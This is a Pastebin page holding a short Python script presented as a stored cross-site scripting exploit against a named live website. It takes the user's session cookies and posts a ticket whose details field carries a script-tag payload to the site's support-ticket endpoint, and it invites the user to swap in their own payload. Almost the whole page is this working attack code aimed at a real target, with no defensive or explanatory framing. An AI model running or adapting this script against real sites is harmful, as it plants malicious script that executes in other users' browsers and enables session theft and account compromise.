Advertisement
FlyFar

An exploit and demonstration on how to exploit a Stored XSS vulnerability in https://anonstress.com

Jan 15th, 2024
859
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.21 KB | Cybersecurity | 0 0
  1. import sys
  2. import requests
  3.  
  4.  
  5. # https://anonstress.com Stored XSS Exploit
  6. # Date: 09/25/21
  7. # Author: 0x1CA3
  8.  
  9.  
  10. class Exploit:
  11.     def __init__(self, sesion_cookie, other_cookie):
  12.         self.sesion_cookie = sesion_cookie
  13.         self.other_cookie = other_cookie
  14.         self.title_name = "testone" # The name for the ticket | Note: You can change this.
  15.         self.xss_payload = "<script>alert(1)</script>" # Edit your own payload here if you would like.
  16.  
  17.     def run(self):
  18.         site_cookies = {
  19.             "31k001c": self.other_cookie,
  20.             "fc_session": self.sesion_cookie
  21.         }
  22.         payload = {
  23.             "n3k0t": self.other_cookie,
  24.             "title": self.title_name,
  25.             "status": "1",
  26.             "details": self.xss_payload
  27.         }
  28.         s = requests.Session()
  29.         s.post("https://anonstress.com/support/ticket/create", cookies=site_cookies, data=payload)
  30.  
  31. def main() -> None:
  32.     if len(sys.argv) < 3:
  33.         print("Usage: python3 exploit.py <fc_session_cookie> <31k001c_cookie>")
  34.         sys.exit()
  35.     sesion_cookie = sys.argv[1]
  36.     other_cookie = sys.argv[2]
  37.     Exploit(sesion_cookie, other_cookie).run()
  38.  
  39. if __name__ == "__main__":
  40.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement